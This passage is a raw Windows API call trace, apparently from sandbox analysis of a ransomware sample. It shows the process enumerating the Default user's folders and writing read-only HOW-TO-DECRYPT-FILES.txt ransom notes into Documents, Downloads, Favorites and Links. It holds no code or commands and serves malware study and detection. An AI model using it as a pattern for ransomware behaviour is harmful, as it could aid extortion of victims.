hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.682] SetErrorMode (uMode=0x0) returned 0x1 [0048.682] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Documents", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Documents", lpFilePart=0x0) returned 0x1a [0048.682] GetLastError () returned 0x12 [0048.682] SetErrorMode (uMode=0x1) returned 0x0 [0048.682] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.683] GetLastError () returned 0x12 [0048.683] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.683] GetLastError () returned 0x12 [0048.683] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.683] GetLastError () returned 0x12 [0048.683] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.684] GetLastError () returned 0x12 [0048.684] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.684] GetLastError () returned 0x12 [0048.684] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.684] GetLastError () returned 0x12 [0048.684] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.684] GetLastError () returned 0x12 [0048.684] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.685] SetErrorMode (uMode=0x0) returned 0x1 [0048.685] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Documents\\desktop.ini", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Documents\\desktop.ini", lpFilePart=0x0) returned 0x26 [0048.685] GetLastError () returned 0x12 [0048.685] SetErrorMode (uMode=0x1) returned 0x0 [0048.685] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\Documents\\desktop.ini" (normalized: "c:\\users\\default\\documents\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1c8250c | out: lpFileInformation=0x1c8250c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c8e990, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c8e990, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x27f56565, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x192)) returned 1 [0048.687] GetLastError () returned 0x12 [0048.687] SetErrorMode (uMode=0x0) returned 0x1 [0048.687] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Documents\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Documents\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x33 [0048.687] GetLastError () returned 0x12 [0048.687] SetErrorMode (uMode=0x1) returned 0x0 [0048.688] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\documents\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.688] GetLastError () returned 0x0 [0048.688] GetFileType (hFile=0x184) returned 0x1 [0048.688] SetErrorMode (uMode=0x0) returned 0x1 [0048.688] GetFileType (hFile=0x184) returned 0x1 [0048.688] WriteFile (in: hFile=0x184, lpBuffer=0x1c9e3c0*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed98, lpOverlapped=0x0 | out: lpBuffer=0x1c9e3c0*, lpNumberOfBytesWritten=0x18ed98*=0x18da, lpOverlapped=0x0) returned 1 [0048.689] GetLastError () returned 0x0 [0048.689] CloseHandle (hObject=0x184) returned 1 [0048.689] GetLastError () returned 0x0 [0048.689] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Documents\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e960, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Documents\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x33 [0048.689] GetLastError () returned 0x0 [0048.689] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Documents\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0048.689] GetLastError () returned 0x0 [0048.689] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Documents\\My Music", nBufferLength=0x105, lpBuffer=0x18e994, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Documents\\My Music", lpFilePart=0x0) returned 0x23 [0048.689] GetLastError () returned 0x0 [0048.689] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.689] GetLastError () returned 0x0 [0048.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e8b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0048.689] GetLastError () returned 0x0 [0048.689] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Documents\\My Music", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Documents\\My Music", lpFilePart=0x0) returned 0x23 [0048.690] GetLastError () returned 0x0 [0048.690] SetErrorMode (uMode=0x1) returned 0x0 [0048.690] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\My Music\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0xffffffff [0048.690] GetLastError () returned 0x5 [0048.697] SetErrorMode (uMode=0x0) returned 0x1 [0048.697] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Documents\\My Pictures", nBufferLength=0x105, lpBuffer=0x18e994, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Documents\\My Pictures", lpFilePart=0x0) returned 0x26 [0048.697] GetLastError () returned 0x5 [0048.698] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.698] GetLastError () returned 0x5 [0048.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e8b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0048.698] GetLastError () returned 0x5 [0048.698] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Documents\\My Pictures", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Documents\\My Pictures", lpFilePart=0x0) returned 0x26 [0048.698] GetLastError () returned 0x5 [0048.698] SetErrorMode (uMode=0x1) returned 0x0 [0048.698] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\My Pictures\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0xffffffff [0048.698] GetLastError () returned 0x5 [0048.699] SetErrorMode (uMode=0x0) returned 0x1 [0048.699] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Documents\\My Videos", nBufferLength=0x105, lpBuffer=0x18e994, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Documents\\My Videos", lpFilePart=0x0) returned 0x24 [0048.699] GetLastError () returned 0x5 [0048.700] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.700] GetLastError () returned 0x5 [0048.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e8b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0048.700] GetLastError () returned 0x5 [0048.700] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Documents\\My Videos", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Documents\\My Videos", lpFilePart=0x0) returned 0x24 [0048.700] GetLastError () returned 0x5 [0048.700] SetErrorMode (uMode=0x1) returned 0x0 [0048.700] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\My Videos\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0xffffffff [0048.700] GetLastError () returned 0x5 [0048.701] SetErrorMode (uMode=0x0) returned 0x1 [0048.701] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Downloads", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Downloads", lpFilePart=0x0) returned 0x1a [0048.701] GetLastError () returned 0x5 [0048.702] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.702] GetLastError () returned 0x5 [0048.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0048.702] GetLastError () returned 0x5 [0048.702] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Downloads", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Downloads", lpFilePart=0x0) returned 0x1a [0048.702] GetLastError () returned 0x5 [0048.702] SetErrorMode (uMode=0x1) returned 0x0 [0048.702] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Downloads\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.702] GetLastError () returned 0x5 [0048.702] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.702] GetLastError () returned 0x5 [0048.702] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.702] GetLastError () returned 0x5 [0048.702] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.702] GetLastError () returned 0x12 [0048.703] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.703] SetErrorMode (uMode=0x0) returned 0x1 [0048.703] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Downloads", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Downloads", lpFilePart=0x0) returned 0x1a [0048.703] GetLastError () returned 0x12 [0048.703] SetErrorMode (uMode=0x1) returned 0x0 [0048.703] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Downloads\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.703] GetLastError () returned 0x12 [0048.703] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.703] GetLastError () returned 0x12 [0048.703] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.703] GetLastError () returned 0x12 [0048.703] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.703] GetLastError () returned 0x12 [0048.703] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.703] SetErrorMode (uMode=0x0) returned 0x1 [0048.704] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Downloads\\desktop.ini", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Downloads\\desktop.ini", lpFilePart=0x0) returned 0x26 [0048.704] GetLastError () returned 0x12 [0048.704] SetErrorMode (uMode=0x1) returned 0x0 [0048.704] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\Downloads\\desktop.ini" (normalized: "c:\\users\\default\\downloads\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1ca3e20 | out: lpFileInformation=0x1ca3e20*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c8e990, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c8e990, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x27ee4144, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x11a)) returned 1 [0048.704] GetLastError () returned 0x12 [0048.704] SetErrorMode (uMode=0x0) returned 0x1 [0048.705] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Downloads\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Downloads\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x33 [0048.705] GetLastError () returned 0x12 [0048.705] SetErrorMode (uMode=0x1) returned 0x0 [0048.705] CreateFileW (lpFileName="C:\\Users\\Default\\Downloads\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\downloads\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.705] GetLastError () returned 0x0 [0048.705] GetFileType (hFile=0x184) returned 0x1 [0048.705] SetErrorMode (uMode=0x0) returned 0x1 [0048.705] GetFileType (hFile=0x184) returned 0x1 [0048.705] WriteFile (in: hFile=0x184, lpBuffer=0x1cbfbc8*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed98, lpOverlapped=0x0 | out: lpBuffer=0x1cbfbc8*, lpNumberOfBytesWritten=0x18ed98*=0x18da, lpOverlapped=0x0) returned 1 [0048.706] GetLastError () returned 0x0 [0048.706] CloseHandle (hObject=0x184) returned 1 [0048.706] GetLastError () returned 0x0 [0048.706] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Downloads\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e960, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Downloads\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x33 [0048.707] GetLastError () returned 0x0 [0048.707] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Downloads\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0048.707] GetLastError () returned 0x0 [0048.707] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites", lpFilePart=0x0) returned 0x1a [0048.707] GetLastError () returned 0x0 [0048.707] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.707] GetLastError () returned 0x0 [0048.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0048.707] GetLastError () returned 0x0 [0048.707] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites", lpFilePart=0x0) returned 0x1a [0048.707] GetLastError () returned 0x0 [0048.707] SetErrorMode (uMode=0x1) returned 0x0 [0048.707] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.718] GetLastError () returned 0x0 [0048.720] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.720] GetLastError () returned 0x0 [0048.720] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.720] GetLastError () returned 0x0 [0048.720] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.720] GetLastError () returned 0x0 [0048.720] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.720] GetLastError () returned 0x0 [0048.720] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.720] GetLastError () returned 0x0 [0048.720] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.720] GetLastError () returned 0x0 [0048.720] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.721] GetLastError () returned 0x12 [0048.721] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.721] SetErrorMode (uMode=0x0) returned 0x1 [0048.722] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites", lpFilePart=0x0) returned 0x1a [0048.722] GetLastError () returned 0x12 [0048.722] SetErrorMode (uMode=0x1) returned 0x0 [0048.722] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.722] GetLastError () returned 0x12 [0048.723] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.723] GetLastError () returned 0x12 [0048.723] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.723] GetLastError () returned 0x12 [0048.723] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.723] GetLastError () returned 0x12 [0048.723] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.723] GetLastError () returned 0x12 [0048.723] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.723] GetLastError () returned 0x12 [0048.723] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.723] GetLastError () returned 0x12 [0048.723] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.723] GetLastError () returned 0x12 [0048.723] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.724] SetErrorMode (uMode=0x0) returned 0x1 [0048.724] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\desktop.ini", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\desktop.ini", lpFilePart=0x0) returned 0x26 [0048.724] GetLastError () returned 0x12 [0048.725] SetErrorMode (uMode=0x1) returned 0x0 [0048.725] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\Favorites\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1cc3018 | out: lpFileInformation=0x1cc3018*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c8e990, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c8e990, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x27ccee00, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x192)) returned 1 [0048.729] GetLastError () returned 0x12 [0048.729] SetErrorMode (uMode=0x0) returned 0x1 [0048.730] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x33 [0048.730] GetLastError () returned 0x12 [0048.730] SetErrorMode (uMode=0x1) returned 0x0 [0048.730] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\favorites\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.730] GetLastError () returned 0x0 [0048.730] GetFileType (hFile=0x184) returned 0x1 [0048.730] SetErrorMode (uMode=0x0) returned 0x1 [0048.730] GetFileType (hFile=0x184) returned 0x1 [0048.730] WriteFile (in: hFile=0x184, lpBuffer=0x1cdeecc*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed98, lpOverlapped=0x0 | out: lpBuffer=0x1cdeecc*, lpNumberOfBytesWritten=0x18ed98*=0x18da, lpOverlapped=0x0) returned 1 [0048.731] GetLastError () returned 0x0 [0048.731] CloseHandle (hObject=0x184) returned 1 [0048.731] GetLastError () returned 0x0 [0048.731] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e960, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x33 [0048.731] GetLastError () returned 0x0 [0048.732] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Favorites\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0048.732] GetLastError () returned 0x0 [0048.732] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\Links", nBufferLength=0x105, lpBuffer=0x18e994, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\Links", lpFilePart=0x0) returned 0x20 [0048.732] GetLastError () returned 0x0 [0048.732] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.732] GetLastError () returned 0x0 [0048.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e8b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0048.732] GetLastError () returned 0x0 [0048.732] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\Links", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\Links", lpFilePart=0x0) returned 0x20 [0048.732] GetLastError () returned 0x0 [0048.732] SetErrorMode (uMode=0x1) returned 0x0 [0048.732] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\Links\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.732] GetLastError () returned 0x0 [0048.733] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.733] GetLastError () returned 0x0 [0048.733] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.733] GetLastError () returned 0x0 [0048.733] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.733] GetLastError () returned 0x0 [0048.733] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.733] GetLastError () returned 0x12 [0048.733] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.733] SetErrorMode (uMode=0x0) returned 0x1 [0048.733] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\Links", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\Links", lpFilePart=0x0) returned 0x20 [0048.733] GetLastError () returned 0x12 [0048.733] SetErrorMode (uMode=0x1) returned 0x0 [0048.733] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\Links\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.733] GetLastError () returned 0x12 [0048.733] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.733] GetLastError () returned 0x12 [0048.733] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.733] GetLastError () returned 0x12 [0048.734] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.734] GetLastError () returned 0x12 [0048.734] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.734] GetLastError () returned 0x12 [0048.734] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.734] SetErrorMode (uMode=0x0) returned 0x1 [0048.734] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\Links\\desktop.ini", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\Links\\desktop.ini", lpFilePart=0x0) returned 0x2c [0048.734] GetLastError () returned 0x12 [0048.734] SetErrorMode (uMode=0x1) returned 0x0 [0048.734] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\links\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1ce1fa0 | out: lpFileInformation=0x1ce1fa0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c8e990, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c8e990, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x29913374, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x50)) returned 1 [0048.734] GetLastError () returned 0x12 [0048.734] SetErrorMode (uMode=0x0) returned 0x1 [0048.735] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\Links\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\Links\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0048.735] GetLastError () returned 0x12 [0048.735] SetErrorMode (uMode=0x1) returned 0x0 [0048.735] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Links\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\favorites\\links\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.735] GetLastError () returned 0x0 [0048.735] GetFileType (hFile=0x184) returned 0x1 [0048.735] SetErrorMode (uMode=0x0) returned 0x1 [0048.735] GetFileType (hFile=0x184) returned 0x1 [0048.735] WriteFile (in: hFile=0x184, lpBuffer=0x1cfde6c*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed2c, lpOverlapped=0x0 | out: lpBuffer=0x1cfde6c*, lpNumberOfBytesWritten=0x18ed2c*=0x18da, lpOverlapped=0x0) returned 1 [0048.736] GetLastError () returned 0x0 [0048.736] CloseHandle (hObject=0x184) returned 1 [0048.736] GetLastError () returned 0x0 [0048.736] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\Links\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\Links\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0048.736] GetLastError () returned 0x0 [0048.736] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Favorites\\Links\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0048.737] GetLastError () returned 0x0 [0048.737] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url", lpFilePart=0x0) returned 0x36 [0048.737] GetLastError () returned 0x0 [0048.737] SetErrorMode (uMode=0x1) returned 0x0 [0048.737] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url" (normalized: 